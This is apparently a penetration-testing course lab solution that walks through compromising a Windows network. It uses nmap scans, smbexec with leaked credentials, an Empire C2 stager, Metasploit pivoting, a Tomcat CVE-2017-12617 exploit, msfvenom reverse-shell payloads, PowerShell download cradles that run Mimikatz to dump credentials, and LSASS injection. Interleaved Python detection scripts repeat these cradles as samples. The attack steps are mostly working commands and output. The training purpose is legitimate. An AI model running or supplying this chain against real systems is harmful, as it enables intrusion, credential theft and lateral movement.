
© 2018 Caendra Inc. | Hera for PTPv5 | Leveraging PowerShell During Exploitation

You have been tasked by an organization to conduct an external penetration test. The
organization's publicly-facing IP address range is 172.16.80.0/24.

Your tester IP address is within the 175.12.80.0/24 range.

Task: Perform remote exploitation and post-exploitation tasks on vulnerable systems, and
gain access to the internal net block, leveraging PowerShell and related tools for as many
tasks as possible.

Network Diagram:

• Identify vulnerabilities from a remote exploitation perspective.
• Exploit discovered vulnerabilities.
• Obtain access to machines on other internal subnets.
• Use PowerShell and related tools for tasks where applicable.

• PowerShell
• Empire
• Smbexec
• Nmap
• Metasploit

One of the systems on the external IP range contains a vulnerability or misconfiguration.


Identify the vulnerability or misconfiguration and obtain access to the vulnerable target
with the ability to execute commands.

Using your ability to execute remote commands on the vulnerable system, use Empire to
generate a PowerShell-based stager and obtain an agent connection from the target, then
conduct some recon of the system and the internal network using Empire modules.

Using the information obtained via recon of the system and of other machines on the internal
network, pivot to and exploit an internal system and obtain a SYSTEM Meterpreter session.

From the Meterpreter session on the exploited internal target system, use a PowerShell
download cradle to dump password hashes using a PowerShell-based Mimikatz hosted on the
attacker system.

Below, you can find solutions for each task for the Remote Exploitation and Post-
Exploitation tasks. Remember though that you can follow your own strategy (which may
be different from the one explained in the following lab).

Using nmap, we conduct a ping scan to identify live hosts within the in-scope external
network range:

# nmap -sn 172.16.80.1/24


Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-06 21:59 EDT
Nmap scan report for 172.16.80.1
Host is up (0.050s latency).
Nmap scan report for 172.16.80.100
Host is up (0.058s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 5.48 seconds

The scan finds two live hosts; our focus will be on the 172.16.80.100 system.

Since only a couple of hosts have been identified at this point, we can afford to scan all 65535 TCP
ports of the system of interest to start our enumeration process:

# nmap -sS -p- 172.16.80.100


Scanning 172.16.80.100 [65535 ports]
Discovered open port 135/tcp on 172.16.80.100
Discovered open port 139/tcp on 172.16.80.100
Discovered open port 445/tcp on 172.16.80.100
Discovered open port 7680/tcp on 172.16.80.100
. . .
Discovered open port 65520/tcp on 172.16.80.100
Discovered open port 4983/tcp on 172.16.80.100

The port scan reveals several common NetBIOS/SMB ports, but more importantly several ports
that are unknown or unidentified at this point in the engagement. In particular, we focus on
port 4983, since enumerating several of the others returned nothing particularly fruitful.

A version scan suggests that this is an HTTP service, as the banner returned by nmap shows:

# nmap -sV 172.16.80.100 -p 4983


Nmap scan report for 172.16.80.100
Host is up (0.053s latency).
PORT STATE SERVICE VERSION
4983/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Our next step is to gain more insight into the purpose of this port; we can either browse to it
or issue a GET request via netcat. We opt to browse to the port and are presented with
credentials in what appears to be a configuration file of sorts:

Alternatively, initiating a netcat connection to the port and issuing a GET request for the
root path “/” returns the same information:

# nc 172.16.80.100 4983
GET /

@echo off
net use "\\10.100.11.150\C$" /user:local_admin P@ssw0rd123
if exist "\\10.100.11.150\C$\Program_Files\MSBuild\ErrorLog.txt" (
    echo "Copying errors..."
    copy "\\10.100.11.150\C$\Program_Files\MSBuild\ErrorLog.txt" C:\Users\local_admin\Logs\Host1\
    del "\\10.100.11.150\C$\Program_Files\MSBuild\ErrorLog.txt"
) else (
    echo "No errors!"
)
net use "\\10.100.11.150\C$" /delete
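The root cause here is an operational script with an embedded plaintext password, served over an unauthenticated HTTP port. As an added defensive check (not part of the lab), the following Python scans script text for "net use" commands that carry a positional password, accepting both argument orders net use allows; the sample script is a constructed copy of the batch file shown above.

```python
import re
from dataclasses import dataclass

# Constructed sample: the batch file exposed on TCP/4983 in the lab, re-typed here.
EXPOSED_SCRIPT = r'''@echo off
net use "\\10.100.11.150\C$" /user:local_admin P@ssw0rd123
if exist "\\10.100.11.150\C$\Program_Files\MSBuild\ErrorLog.txt" (
    echo "Copying errors..."
    copy "\\10.100.11.150\C$\Program_Files\MSBuild\ErrorLog.txt" C:\Users\local_admin\Logs\Host1\
    del "\\10.100.11.150\C$\Program_Files\MSBuild\ErrorLog.txt"
) else (
    echo "No errors!"
)
net use "\\10.100.11.150\C$" /delete
'''


@dataclass(frozen=True)
class NetUseCredential:
    line_no: int
    share: str
    user: str
    password: str


# "net use [drive:] \\server\share [password] /user:[domain\]user [switches]"
# The password may sit before or after /user:, so the share is anchored and the
# remaining non-switch token is treated as the positional password.
_NET_USE = re.compile(
    r'^\s*net\s+use\s+(?:[A-Za-z]:\s+|\*\s+)?(?P<share>"[^"]+"|\S+)(?P<rest>.*)$', re.I)
_USER = re.compile(r'/user:(?P<user>\S+)', re.I)


def find_net_use_credentials(script: str) -> list[NetUseCredential]:
    """Return every net use line that embeds a literal password."""
    findings = []
    for n, line in enumerate(script.splitlines(), 1):
        m = _NET_USE.match(line)
        if not m:
            continue
        rest = m.group('rest')
        um = _USER.search(rest)
        if not um:
            continue  # no /user switch: mapped with the caller's own identity
        # strip the /user token and all other switches; what is left is the password
        leftovers = [t for t in rest.replace(um.group(0), ' ').split()
                     if not t.startswith('/')]
        if not leftovers or leftovers[0] == '*':
            continue  # "*" tells net use to prompt, so nothing is embedded
        findings.append(NetUseCredential(n, m.group('share').strip('"'),
                                         um.group('user'), leftovers[0]))
    return findings


if __name__ == '__main__':
    for f in find_net_use_credentials(EXPOSED_SCRIPT):
        print(f'line {f.line_no}: share {f.share} user {f.user} '
              f'password {f.password[:2]}{"*" * (len(f.password) - 2)}')
```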

Now that we've obtained some credentials, we can try to use them to execute commands
with the “smbexec.py” tool (part of the impacket toolkit). We know the system is exposing
NetBIOS/SMB ports, so we will attempt to use those ports with our newly obtained
credentials.

First, we use smbexec to get a semi-interactive shell on the target (possible since we found a
privileged set of credentials):

# python smbexec.py 'local_admin:P@ssw0rd123'@172.16.80.100

Note: If exploitation with the above method fails or disconnects for whatever reason, smbexec
may fail to delete the BTOBTO service it creates on the target, which then causes
re-exploitation to fail. In that rare case, re-exploiting the machine via this specific attack
vector may require a machine reset.
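The lingering BTOBTO service mentioned in the note is also what a defender looks for: every service install is recorded as Event ID 7045 in the System log. As an added example (not from the lab), this Python triages 7045 messages; the BTOBTO name comes from the lab text, the command-line heuristics are my own, and both sample events are constructed.

```python
import re

# Constructed Event ID 7045 messages, laid out as Event Viewer renders them.
SAMPLE_EVENTS = [
    # modelled on what smbexec leaves behind: a service named BTOBTO (the default
    # named in the lab) whose "binary" is a cmd.exe one-liner (command constructed)
    """A service was installed in the system.

Service Name:  BTOBTO
Service File Name:  %COMSPEC% /Q /c echo whoami ^> \\\\127.0.0.1\\C$\\__output 2^>^&1 > %TEMP%\\execute.bat & %COMSPEC% /Q /c %TEMP%\\execute.bat & del %TEMP%\\execute.bat
Service Type:  user mode service
Service Start Type:  demand start
Service Account:  LocalSystem""",
    # an ordinary vendor service install for contrast (constructed)
    """A service was installed in the system.

Service Name:  VendorUpdateSvc
Service File Name:  "C:\\Program Files\\Vendor\\UpdateSvc.exe"
Service Type:  user mode service
Service Start Type:  auto start
Service Account:  LocalSystem""",
]

_FIELD = re.compile(
    r'^(?P<key>Service (?:Name|File Name|Type|Start Type|Account)):\s*(?P<val>.*)$', re.M)

# service names that remote-execution tooling uses by default (BTOBTO: smbexec, per the lab)
KNOWN_TOOL_SERVICE_NAMES = {'BTOBTO'}
# a real service points at a service executable, not at a command interpreter
SHELL_LAUNCHERS = re.compile(r'(%COMSPEC%|\bcmd(?:\.exe)?\b|\bpowershell(?:\.exe)?\b)', re.I)


def parse_7045(message: str) -> dict:
    """Extract the key/value fields of a 7045 message into a dict."""
    return {m.group('key'): m.group('val').strip() for m in _FIELD.finditer(message)}


def triage_7045(message: str) -> list[str]:
    """Return the reasons a service-install event looks like remote execution tooling
    (empty list means nothing stood out)."""
    ev = parse_7045(message)
    reasons = []
    if ev.get('Service Name', '').upper() in KNOWN_TOOL_SERVICE_NAMES:
        reasons.append('service name matches smbexec default (BTOBTO)')
    path = ev.get('Service File Name', '')
    if SHELL_LAUNCHERS.search(path):
        reasons.append('service binary is a command interpreter, not a service executable')
    if '^>' in path or '%TEMP%' in path.upper():
        reasons.append('binary path stages a batch file / redirects output')
    if reasons and ev.get('Service Start Type', '').lower() == 'demand start':
        reasons.append('demand start: created to run once, consistent with remote exec tooling')
    return reasons


if __name__ == '__main__':
    for msg in SAMPLE_EVENTS:
        ev = parse_7045(msg)
        print(ev['Service Name'], '->', triage_7045(msg) or 'no findings')
```

A 7045 with these traits on a host that also shows the SMB logon from the tester address (Event ID 4624, logon type 3) is the smbexec footprint; `sc query BTOBTO` on the host confirms the leftover service the note describes.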

We conduct some basic local enumeration, show the interfaces configured on the system,
and determine the system is multihomed, with an interface configured for the internal
network (10.100.11.101):

C:\windows\system32> ipconfig

We also run “echo %userdomain%”, a quick way to learn whether the current user is part of a
domain and, if so, the domain name. We learn that the user is part of the domain
“ELS-CHILD”:

C:\Windows\system32>echo %userdomain%
ELS-CHILD

Our next task is to obtain a connection from the system back to an Empire listener. Before
getting started with this step, please follow the instructions on installing Empire here:

https://github.com/EmpireProject/Empire#install

Note: This lab was tested with Version 2.1 of Empire. Later versions may have some issues in
regard to following the lab tasks presented here. Please download the correct version from the
following link: https://github.com/EmpireProject/Empire/releases

Once Empire has been installed, we can launch it by simply executing the ./empire command
from within the Empire directory:

# ./empire

At the (Empire) > prompt, we type the “listeners” command to enter the Listeners
menu:

(Empire) > listeners


[!] No listeners currently active

Next, we configure a new “http” listener by issuing the “uselistener” command followed by
“http,” which will put us in the http listener configuration area:

(Empire: listeners) > uselistener

dbx          http_com      http_hop      meterpreter   redirector
http         http_foreign  http_mapi     onedrive
(Empire: listeners) > uselistener http

The “info” command can then be used to view all options related to the http listener we've
selected. Options are set much as in Metasploit, with the “set <option> <value>” syntax.

(Empire: listeners/http) > info

There are several options available, but most importantly, for now, let’s just set the “Host”
option with our OpenVPN tunnel interface IP address which should be in the 175.12.80.0/24
range:

(Empire: listeners/http) > set Host 175.12.80.20

Once that is complete, we use the “Execute” command to initialize our listener:

(Empire: listeners/http) > execute


[*] Starting listener 'http'
[+] Listener successfully started!

Now that our listener is up and “listening,” we’ll want to generate a “stager.” The “Stager” is
the code we’re going to run on our target once we generate it. We can generate a stager by
first exiting out of the “Listener” area back to the “main” section by executing the “main”
command and then typing the “usestager” command. If we type “usestager <space> <tab>”
we should get a listing of all available stagers:

(Empire: listeners/http) > main
(Empire) > usestager

We’ll select the “multi/launcher” stager by issuing the “usestager multi/launcher” command:

(Empire) > usestager multi/launcher

Again, we configure the necessary options, which typically just means telling the stager
which listener to connect back to, using the “set Listener <listener name>” command. In this
example, our listener name was “http”:

(Empire: stager/multi/launcher) > set Listener http

Once our stager is configured with the name of the listener, we can once again type the
“Execute” command to have Empire generate our stager code:

(Empire: stager/multi/launcher) > execute

At this point, Empire has generated an encoded PowerShell command, which we will execute in
the smbexec shell we obtained previously:

We copy and paste the Empire-generated PowerShell code into our smbexec shell and press
<enter>. Upon doing so, we should receive an agent connection back to our Empire
listener:

(Empire: stager/multi/launcher) > [+] Initial agent YC7T8PM2 from 172.16.80.100 now active

If we now type the “agents” command within Empire, we can confirm our agent has phoned
home to the Empire C2 and is currently active via a “powershell” process on the target
system:

(Empire: stager/multi/launcher) > agents

Since we determined that the host running our agent has an internal interface with an IP
address on the 10.100.11.0/24 network, our first task is to identify live hosts on that
subnet. We conduct an ARP scan against the 10.100.11.0/24 range.

We can use the “arpscan” module to accomplish this. First, we should interact with the agent
by using the “interact” command followed by our active agent name:

(Empire: agents) > interact YC7T8PM2


(Empire: YC7T8PM2) >

We can then load the “arpscan” module with the “usemodule” command:

(Empire: YC7T8PM2) > usemodule situational_awareness/network/arpscan


(Empire: powershell/situational_awareness/network/arpscan) >

We then set the CIDR block for the 10.100.11.0/24 network, and the agent name, and run the
“execute” command:

(Empire: powershell/situational_awareness/network/arpscan) > set CIDR 10.100.11.0/24
(Empire: powershell/situational_awareness/network/arpscan) > set Agent YC7T8PM2
(Empire: powershell/situational_awareness/network/arpscan) > execute

After several seconds, our agent returns the results of the ARP scan:

We can then port scan the identified hosts with the “portscan” module. We will scan the
10.100.11.100 host, as this is a new host we were initially unaware of.

Let’s first load the portscan module with the usemodule command, configure the “Hosts”
value and set our Agent name as well, and finally run the “execute” command:

(Empire: powershell/situational_awareness/network/arpscan) > usemodule powershell/situational_awareness/network/portscan
(Empire: powershell/situational_awareness/network/portscan) > set Hosts 10.100.11.100
(Empire: powershell/situational_awareness/network/portscan) > set Agent YC7T8PM2
(Empire: powershell/situational_awareness/network/portscan) > execute

We've identified TCP 8443 as open on this second internal machine. Our next step is to use
our current host as a pivot to reach the newly found machine and port.

Now that we have information on yet another internal machine, at 10.100.11.100, and have
identified an open port, let’s move onto pivoting from our current host to the new one.

Since we're going to need additional tooling (Metasploit) to accomplish the next task, we
need to hand our existing Empire agent over to Metasploit. We can use the Empire
“invoke_metasploitpayload” module for this. The module, as its name implies, allows us to
execute a Metasploit payload, which effectively sends our Empire agent to a listener we
have configured within Metasploit.

Our first step is to generate a payload we can feed to the Empire agent. We'll use Metasploit's
“web_delivery” module for this. The web_delivery module generates a PowerShell payload
URL, which we then provide to the Empire agent via the “invoke_metasploitpayload” module.

In Metasploit, let’s first prepare the “web_delivery” module.

msf > use exploit/multi/script/web_delivery

Next, we set the “target” option to “2” in order to use a compatible powershell payload:

msf exploit(multi/script/web_delivery) > set target 2

We then configure the SRVHOST option. This is the IP address our web_delivery module
will bind to; it should be the tester's VPN tunnel interface IP address:

msf exploit(multi/script/web_delivery) > set SRVHOST 175.12.80.21

Lastly, we configure a payload option and our LHOST IP for the payload. We’ll use a windows
meterpreter reverse_tcp payload:

msf exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set LHOST 175.12.80.21

And finally, we run the “exploit -j” command to initialize our handler, and generate our
Powershell Payload URL:

msf exploit(multi/script/web_delivery) > exploit -j

We’re going to use the URL identified by the “Using URL:” message in the above web_delivery
module output.

http://175.12.80.21:8080/JAFRM0WEjw6cf

Back at our Empire C2, in order to pass our agent to metasploit, we need to load the
“invoke_metasploitpayload” module.

(Empire: powershell/situational_awareness/network/portscan) > usemodule code_execution/invoke_metasploitpayload

We then configure the “URL” value to be that of our metasploit web delivery URL and assign
the stager to an Active agent in Empire, and finally, when that is complete, we can use the
“Execute” command.

(Empire: powershell/code_execution/invoke_metasploitpayload) > set URL http://175.12.80.21:8080/JAFRM0WEjw6cf
(Empire: powershell/code_execution/invoke_metasploitpayload) > set Agent U6XFELVM
(Empire: powershell/code_execution/invoke_metasploitpayload) > execute

Upon doing that, our Metasploit handler has now received a connection from the agent, and
we can continue with our task of pivoting and exploiting the 10.100.11.100 target:

Now that we’ve transferred our agent to Metasploit, we’ll first want to run the “autoroute”
module on our new meterpreter session. This will add the necessary routes to the Metasploit
routing table that will allow us to pivot to the 10.100.11.100 machine:

msf exploit(multi/script/web_delivery) > use post/multi/manage/autoroute


msf post(multi/manage/autoroute) > set SESSION 1
msf post(multi/manage/autoroute) > run

Now that our routes to the 10.100.11.0/24 network are in place, we can use the socks4a
module to proxy connections to the 10.100.11.100 machine and conduct additional recon:

msf post(multi/manage/autoroute) > use auxiliary/server/socks4a

We’ll then set our proxy SRVHOST value to be that of our VPN tunnel IP address, and run the
module:

msf auxiliary(server/socks4a) > set SRVHOST 175.12.80.21


SRVHOST => 175.12.80.21
msf auxiliary(server/socks4a) > run
[*] Auxiliary module running as background job 1.
[*] Starting the socks4a proxy server

Next, after we’ve configured our browser to use our socks4a proxy:

We should be able to browse to the TCP 8443 port that we discovered on the 10.100.11.100
machine, where we find an Apache Tomcat 7.0.81 instance:

We find that the host manager is password protected, but we know from researching this
particular version of Apache Tomcat that it may be vulnerable to CVE-2017-12617, which
allows arbitrary JSP files to be uploaded when Tomcat is configured to allow PUT requests:

We can also see that a Metasploit module is available. Before we can try to exploit this, we
need to use the “portproxy” module so that the payload can connect back from the internal
machine to our tester IP address, by proxying the connection through the first host we
compromised, the 10.100.11.101 machine.

We first load the portproxy module in Metasploit:

msf exploit(multi/http/tomcat_jsp_upload_bypass) > use post/windows/manage/portproxy

We then configure our CONNECT_ADDRESS, CONNECT_PORT, LOCAL_ADDRESS and LOCAL_PORT
options, and tell the module which session to run on with the SESSION value:

msf post(windows/manage/portproxy) > set CONNECT_ADDRESS 175.12.80.21


msf post(windows/manage/portproxy) > set CONNECT_PORT 4444
msf post(windows/manage/portproxy) > set LOCAL_ADDRESS 10.100.11.101
msf post(windows/manage/portproxy) > set LOCAL_PORT 4444
msf post(windows/manage/portproxy) > set SESSION 1
msf post(windows/manage/portproxy) > run

Once the portproxy is configured, we can load our Tomcat Exploit module for the JSP Upload
Bypass vulnerability, and configure it. We need to modify the default RPORT option to be
that of the TCP port 8443 we found, and we’ll also need to change the default payload as well,
in addition to making sure we also define our LHOST to be that of the pivot machine’s
external IP 172.16.80.100:

msf post(windows/manage/portproxy) > use exploit/multi/http/tomcat_jsp_upload_bypass
msf exploit(multi/http/tomcat_jsp_upload_bypass) > set RHOST 10.100.11.100
msf exploit(multi/http/tomcat_jsp_upload_bypass) > set RPORT 8443
msf exploit(multi/http/tomcat_jsp_upload_bypass) > set LHOST 172.16.80.100
msf exploit(multi/http/tomcat_jsp_upload_bypass) > set payload java/jsp_shell_reverse_tcp

msf exploit(multi/http/tomcat_jsp_upload_bypass) > run

At this point, we should have received a shell from the Tomcat system:

Our next step is to upgrade our shell to a Meterpreter shell. We accomplish this by first
generating a new payload, hosting it with Python's SimpleHTTPServer, and delivering it
to the Tomcat host via a PowerShell download cradle.

First, we generate our payload:

# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.100.11.101 LPORT=4444 -f exe > /tmp/payload.exe

We then host the payload with a python SimpleHTTPServer on port 8000 on our attacker
machine:

# cd /tmp && python -m SimpleHTTPServer 8000

We then need to create another portproxy to serve the payload to the Tomcat machine,
again configured on the Windows 7 pivot host's SESSION:

msf exploit(multi/http/tomcat_jsp_upload_bypass) > use post/windows/manage/portproxy
msf post(windows/manage/portproxy) > set CONNECT_ADDRESS 175.12.80.22
msf post(windows/manage/portproxy) > set CONNECT_PORT 8000
msf post(windows/manage/portproxy) > set LOCAL_ADDRESS 10.100.11.101
msf post(windows/manage/portproxy) > set LOCAL_PORT 8000
msf post(windows/manage/portproxy) > set SESSION 1
msf post(windows/manage/portproxy) > run
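Metasploit's portproxy module drives the built-in Windows netsh interface portproxy facility, so the forwards it creates are visible to anyone auditing the pivot host. As an added defensive example (not from the lab), this Python parses the output of `netsh interface portproxy show v4tov4` and flags rules whose connect side leaves the organisation's address space; the netsh output is constructed to mirror the two forwards configured above, and the RFC 1918 "internal" definition is an assumption to adjust per environment.

```python
import ipaddress
import re
from dataclasses import dataclass

# Constructed output of "netsh interface portproxy show v4tov4" as it would look on the
# 10.100.11.101 pivot after both portproxy modules in the lab have run.
NETSH_OUTPUT = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
10.100.11.101   4444        175.12.80.21    4444
10.100.11.101   8000        175.12.80.22    8000
"""


@dataclass(frozen=True)
class PortProxyRule:
    listen_addr: str
    listen_port: int
    connect_addr: str
    connect_port: int


# data rows: addr port addr port; header and separator lines do not match
_RULE = re.compile(r'^\s*(\S+)\s+(\d+)\s+(\S+)\s+(\d+)\s*$')


def parse_portproxy(output: str) -> list[PortProxyRule]:
    """Turn netsh's v4tov4 table into rule objects (hostname entries are skipped)."""
    rules = []
    for line in output.splitlines():
        m = _RULE.match(line)
        if not m:
            continue
        listen, lport, connect, cport = m.groups()
        try:
            ipaddress.ip_address(listen)
            ipaddress.ip_address(connect)
        except ValueError:
            continue  # netsh also accepts hostnames; out of scope here
        rules.append(PortProxyRule(listen, int(lport), connect, int(cport)))
    return rules


def suspicious_rules(rules, internal_nets=('10.0.0.0/8', '172.16.0.0/12', '192.168.0.0/16')):
    """Forwards whose destination is outside the internal ranges: an internal host relaying
    traffic outward is exactly the C2 and payload path built in this lab."""
    nets = [ipaddress.ip_network(n) for n in internal_nets]
    flagged = []
    for r in rules:
        dst = ipaddress.ip_address(r.connect_addr)
        if not any(dst in n for n in nets):
            flagged.append(r)
    return flagged


if __name__ == '__main__':
    for r in suspicious_rules(parse_portproxy(NETSH_OUTPUT)):
        print(f'{r.listen_addr}:{r.listen_port} -> {r.connect_addr}:{r.connect_port}')
```

The same rules persist across reboots under HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp, so a registry audit finds them even when netsh output is not collected.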

We should now have two portproxies configured: one for the earlier Tomcat listener, and a
new one which we're going to use to serve our Meterpreter payload to the Tomcat
machine:

We then need to configure a new listener to accept the connection from our payload.exe once
we execute it on the Tomcat system, but first, we need to kill our previous listener:

msf post(windows/manage/portproxy) > jobs -K


msf post(windows/manage/portproxy) > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 175.12.80.22
msf exploit(multi/handler) > set LPORT 4444
msf exploit(multi/handler) > exploit -j

Once our new listener is running, we can execute the following powershell download cradle
from the tomcat session:

C:\Program Files\Apache Software Foundation\Tomcat 7.0>powershell -c iex (New-Object Net.WebClient).DownloadFile('http://10.100.11.101:8000/payload.exe', 'C:\Windows\Temp\payload.exe')

And then execute our payload, which should now be in the C:\windows\Temp directory on
the tomcat machine:

C:\Program Files\Apache Software Foundation\Tomcat 7.0>C:\windows\temp\payload.exe

At which point, we should then get a new upgraded meterpreter shell from the tomcat
machine:

[*] Sending stage (206403 bytes) to 172.16.80.100
[*] Meterpreter session 3 opened (175.12.80.22:4444 -> 172.16.80.100:49885) at 2018-03-20 13:21:43 -0400

Our last task is to use the Meterpreter shell to download a PowerShell-based Mimikatz via a
PowerShell download cradle and dump local credentials from the Tomcat system.

Since our portproxies are already configured, this task should be a bit more straightforward.

First, let's make sure we're hosting the Invoke-Mimikatz.ps1 script on our attacker system,
again in the /tmp directory, for which we should already have a Python web server running
on port 8000.

Download the mimikatz script from here:

https://raw.githubusercontent.com/clymb3r/PowerShell/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1

And copy it into your /tmp directory on the attacker machine.

Next, back in Metasploit on our new SYSTEM Meterpreter session on the Tomcat machine,
we can drop into a shell with the “shell” command:

meterpreter > shell
Process 3720 created.
Channel 8 created.
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Windows\Temp>

We can then use the following command to download and execute the Mimikatz script
hosted on our attacker machine:

C:\Windows\Temp> powershell -c iex (New-Object Net.WebClient).DownloadString('http://10.100.11.101:8000/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds
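Both download cradles used in this lab (the DownloadFile one that fetched payload.exe and the DownloadString one above) share a shape that PowerShell script block logging (Event ID 4104) or process command-line telemetry captures verbatim. As an added defensive example (not part of the lab), this Python scores such command lines; the two cradle samples are copied from the lab text, the benign sample is constructed, and the weights are my own.

```python
import re
from dataclasses import dataclass, field

# Samples as they would appear in 4104 ScriptBlockText or process-creation command lines:
# the two cradles from this lab, plus a constructed benign administrative command.
SAMPLES = [
    "powershell -c iex (New-Object Net.WebClient).DownloadFile('http://10.100.11.101:8000/payload.exe', 'C:\\Windows\\Temp\\payload.exe')",
    "powershell -c iex (New-Object Net.WebClient).DownloadString('http://10.100.11.101:8000/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds",
    "powershell -ExecutionPolicy Bypass -File C:\\Scripts\\Rotate-Logs.ps1 -Days 30",
]


@dataclass
class CradleFinding:
    score: int = 0
    reasons: list = field(default_factory=list)
    urls: list = field(default_factory=list)


_EXEC = re.compile(r'\b(iex|invoke-expression)\b', re.I)
_WEBCLIENT = re.compile(r'new-object\s+(system\.)?net\.webclient', re.I)
_DOWNLOAD = re.compile(r'\.download(string|file|data)\s*\(', re.I)
_CREDTOOL = re.compile(r'invoke-mimikatz|-dumpcreds', re.I)
_URL = re.compile(r"https?://[^\s'\")]+", re.I)
# RFC 1918 origin: the payload is staged on an internal host, as via the lab's pivot
_INTERNAL_URL = re.compile(r'https?://(10\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.)')


def analyze(command_line: str) -> CradleFinding:
    """Score one command line; each matched trait adds a weight and a reason."""
    f = CradleFinding()
    if _WEBCLIENT.search(command_line) and _DOWNLOAD.search(command_line):
        f.score += 3
        f.reasons.append('WebClient download call')
    if _EXEC.search(command_line):
        f.score += 2
        f.reasons.append('Invoke-Expression / iex present')
    if _CREDTOOL.search(command_line):
        f.score += 5
        f.reasons.append('credential-dumping tool invocation')
    f.urls = _URL.findall(command_line)
    if any(_INTERNAL_URL.match(u) for u in f.urls):
        f.score += 1
        f.reasons.append('content fetched from an internal host (lateral staging)')
    return f


def is_download_cradle(command_line: str) -> bool:
    """Download plus in-memory execution (or a credential tool) crosses the threshold."""
    return analyze(command_line).score >= 5


if __name__ == '__main__':
    for s in SAMPLES:
        f = analyze(s)
        print(f.score, f.reasons, f.urls)
```

The extracted URLs double as indicators: the serving host here is the compromised pivot, so the hit points straight at the first foothold.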

At which point, we have successfully obtained hashes:

Another useful Empire module worth noting is “psinject”.

The psinject module allows us to inject our agent into another process, which is useful for
moving to a stable process if our existing host process isn't playing nicely.

To use the psinject module, we first interact with our agent using the “interact <agent name>”
command. Once interacting with the agent, we issue the “shell ps” command to run a shell
command on the target that lists all processes:

(Empire: agents) > interact DEAW39F4


(Empire: DEAW39F4) > shell ps
[*] Tasked DEAW39F4 to run TASK_SHELL
[*] Agent DEAW39F4 tasked with task ID 1
(Empire: DEAW39F4) >
[*] Agent DEAW39F4 returned results.

Next, let’s use the “psinject” module to inject into the LSASS process for a bit more stability
with our tasks. We can use the “searchmodule” command to find modules. We then use the
“usemodule <module name>” command to load the module we’d like to use, in this case, the
psinject module:

(Empire: DEAW39F4) > searchmodule psinject

powershell/management/psinject
Utilizes Powershell to inject a Stephen Fewer formed ReflectivePick
which executes PS codefrom memory in a remote process
(Empire: DEAW39F4) > usemodule management/psinject

Our earlier “shell ps” output showed that the PID of the LSASS process was 472, so let's use
psinject to inject into that process. First we set the Agent with “set Agent <Agent>”, then the
Listener and ProcId values:

(Empire: powershell/management/psinject) > set Agent DEAW39F4


(Empire: powershell/management/psinject) > set Listener http
(Empire: powershell/management/psinject) > set ProcId 472
(Empire: powershell/management/psinject) > execute

Once that is done, a new agent should phone-home, from the lsass process:
